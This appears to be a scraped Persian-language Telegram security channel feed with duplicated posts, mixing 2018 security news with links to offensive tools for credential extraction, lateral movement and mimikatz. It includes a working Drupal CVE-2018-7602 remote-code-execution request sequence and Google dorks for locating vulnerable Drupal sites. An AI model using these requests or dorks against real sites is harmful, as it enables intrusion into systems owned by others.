استخراج پسوردهای ذخیره شده در اینترنت اکسپلورر و edge
https://github.com/HanseSecure/credgrap_ie_edge
#windows
#edge
#browser
#ps
@sec_nerd
https://github.com/HanseSecure/credgrap_ie_edge
#windows
#edge
#browser
#ps
@sec_nerd
GitHub
GitHub - HanseSecure/credgrap_ie_edge: Extract stored credentials from Internet Explorer and Edge
Extract stored credentials from Internet Explorer and Edge - HanseSecure/credgrap_ie_edge
حرکات جانبی در شبکه های ویندوزی با استفاده از RDP
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
#windows
#network
#pivoting
#privesc
#lateral_movement
@sec_nerd
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
#windows
#network
#pivoting
#privesc
#lateral_movement
@sec_nerd
Penetration Testing Lab
Lateral Movement – RDP
The Remote Desktop Protocol (RDP) is widely used across internal networks by Administrators. This allows systems owners and admins to manage Windows environments remotely. However RDP can give vari…
شهر آتلانتا 2.6 میلیون دلار برای رهایی از یک باج افزار با نام SamSam هزینه کرده است!
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!
https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/
#ransom
#ransomware
#usa
@sec_nerd
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!
https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/
#ransom
#ransomware
#usa
@sec_nerd
WIRED
Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare
Whether to pay ransomware is a complicated—and costly—calculation.
بازی طراحی شده توسط CIA از حالت محرمانه خارج شد.
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.
اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all
#cia
#Usa
#agents
@sec_nerd
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.
اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all
#cia
#Usa
#agents
@sec_nerd
Kickstarter
CIA: Collect It All
A competitive card game based on the CIA's declassified training game: Collection Deck.
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
#drupal
#exploit
#rce
@sec_nerd
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
#drupal
#exploit
#rce
@sec_nerd
اسکریپتهای پاورشل مفید برای انجام تست نفوذ در سیستمهای ویندوزی
https://github.com/rvrsh3ll/Misc-Powershell-Scripts
#ps
#windows
#network
#privesc
@sec_nerd
https://github.com/rvrsh3ll/Misc-Powershell-Scripts
#ps
#windows
#network
#privesc
@sec_nerd
GitHub
GitHub - rvrsh3ll/Misc-Powershell-Scripts: Random Tools
Random Tools. Contribute to rvrsh3ll/Misc-Powershell-Scripts development by creating an account on GitHub.
باج افزار جدیدی با خواص جدید به میدان آمده است.
این باج افزار بجای استفاده از تکنیک رایج قطعه قطعه سازی و اجرای خود، قطعه ای از کد رمزنگاری شده ی سی شارپ را در زمان اجرا کامپایل و بصورت مستقیم در حافظه بارگذاری میکند.
این عمل باعث میشود تا مشکل مرسوم شناسایی شدن در run time توسط آنتی ویروسها حل شده و باج افزار به راحتی عملیات خود را اجرا کند.
منبع:
https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/
#ransomware
#ransom
#windows
#csharp
@sec_nerd
این باج افزار بجای استفاده از تکنیک رایج قطعه قطعه سازی و اجرای خود، قطعه ای از کد رمزنگاری شده ی سی شارپ را در زمان اجرا کامپایل و بصورت مستقیم در حافظه بارگذاری میکند.
این عمل باعث میشود تا مشکل مرسوم شناسایی شدن در run time توسط آنتی ویروسها حل شده و باج افزار به راحتی عملیات خود را اجرا کند.
منبع:
https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/
#ransomware
#ransom
#windows
#csharp
@sec_nerd
BleepingComputer
New C# Ransomware Compiles itself at Runtime
A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executables compiles an embedded encrypted C# program at runtime and launches it directly…
وبسایت www.broadbandgenie.co.uk پس از انجام یک نظرسنجی اعلام کرد ۸۶ درصد از شرکت کنندگان هرگز firmware روتر خود را آپدیت نمیکنند و ۸۲ درصد نیز پسورد پیش فرض ادمین را تغییر نمیدهند!
51 درصد از مدیران شبکه نیز پس از راه اندازی روترها، هیچ واکنش و اقدام ثانوی ندارند!
https://www.broadbandgenie.co.uk/blog/20180409-wifi-router-security-survey
#news
#router
#network
@sec_nerd
51 درصد از مدیران شبکه نیز پس از راه اندازی روترها، هیچ واکنش و اقدام ثانوی ندارند!
https://www.broadbandgenie.co.uk/blog/20180409-wifi-router-security-survey
#news
#router
#network
@sec_nerd
www.broadbandgenie.co.uk
Wi-Fi router security knowledge gap putting devices and private data at risk in UK homes - Broadband Genie
New research by Broadband Genie has found that routers across the UK could be at risk from hackers and viruses because many don’t know how to manage basic security and maintenance features on Wi-Fi routers, ...
Media is too big
VIEW IN TELEGRAM
اجرای mimikatz بر روی ویندوز سرور ۲۰۱۹ و دور زدن defender
https://bit.ly/2DNn1ik
#windows
#mimikatz
#privesc
@sec_nerd
https://bit.ly/2DNn1ik
#windows
#mimikatz
#privesc
@sec_nerd
سرقت هش های NTLM در ویندوز با استفاده از فایل PDF
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
#windows
#privesc
#pdf
@sec_nerd
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
#windows
#privesc
@sec_nerd
Check Point Research
NTLM Credentials Theft via PDF Files - Check Point Research
Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can also reveal that NTLM hash leaks can also be achieved via PDF files…
Learn Python The Hard Way, 3rd Edition .pdf
https://github.com/hocchudong/learnpythonthehardway-vn/blob/master/Docs/Learn%20Python%20The%20Hard%20Way%2C%203rd%20Edition%20.pdf
#python
#dev
@sec_nerd
https://github.com/hocchudong/learnpythonthehardway-vn/blob/master/Docs/Learn%20Python%20The%20Hard%20Way%2C%203rd%20Edition%20.pdf
#python
#dev
@sec_nerd
GitHub
learnpythonthehardway-vn/Learn Python The Hard Way, 3rd Edition .pdf at master · hocchudong/learnpythonthehardway-vn
Reference from learnpythonthehardway.org. Thanks ! - learnpythonthehardway-vn/Learn Python The Hard Way, 3rd Edition .pdf at master · hocchudong/learnpythonthehardway-vn
اجرای دستورات سیستمی با استفاده از فایلهای باینری ساین شده Nvidia
https://sysadminconcombre.blogspot.com/2018/04/run-system-commands-through-nvidia.html
#windows
#privesc
#nvidia
@sec_nerd
https://sysadminconcombre.blogspot.com/2018/04/run-system-commands-through-nvidia.html
#windows
#privesc
#nvidia
@sec_nerd
Blogspot
Running system commands through Nvidia signed binaries
A while ago, when working on PowerMemory, I discovered a hidden account configured by Nvidia on one of my computers ( https://twitter.com/p...
وب سایت https://webstresser.org که به ارائه خدمات DDOS در اینترنت شهرت داشت، با همکاری پلیس کشورهای کانادا، هلند، بریتانیا، صربستان، کرواسی، اسپانیا، ایتالیا، آلمان، استرالیا، هنگ کنگ، امریکا و اینترپل این وبسایت با حکم دادگاه شرقی ویرجینیا، توسط دپارتمان دفاع ایالات متحده مصادره شد.
قیمتهای خدمات این سایت بسیار پایین بوده و فروشگاه آن بیش از 136 هزار عضو داشته است.
نام عملیات جمع آوری این وبسایت Operation Power Off است.
https://www.hackread.com/ddos-for-hire-service-shut-down-domain-seized/
#news
#ddos
@sec_nerd
قیمتهای خدمات این سایت بسیار پایین بوده و فروشگاه آن بیش از 136 هزار عضو داشته است.
نام عملیات جمع آوری این وبسایت Operation Power Off است.
https://www.hackread.com/ddos-for-hire-service-shut-down-domain-seized/
#news
#ddos
@sec_nerd
HackRead
Authorities bust world's largest DDoS-for-hire service & seize its domain
The world's largest DDoS-for-hire service platform Webstresser.org has been shut down and its domain seized by law enforcement authorities from around the world.
امنیت اطلاعات
دورک های گوگل برای آسیب پذیری دروپال inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied" inurl:"user/register?element_parents=account/mail" inurl:"*drupal_ajax" #drupal #exploit #rce @sec_nerd
اسکن کننده لیست وبسایتها برای یافتن آسیب پذیری Drupalgeddon2 بصورت مولتی ترد
https://github.com/0x4148/Drupalgeddon2_scanner
#drupal
#exploit
#rce
@sec_nerd
https://github.com/0x4148/Drupalgeddon2_scanner
#drupal
#exploit
#rce
@sec_nerd
GitHub
0x4148/Drupalgeddon2_scanner
Multithreaded drupalgeddon2 scanner. Contribute to 0x4148/Drupalgeddon2_scanner development by creating an account on GitHub.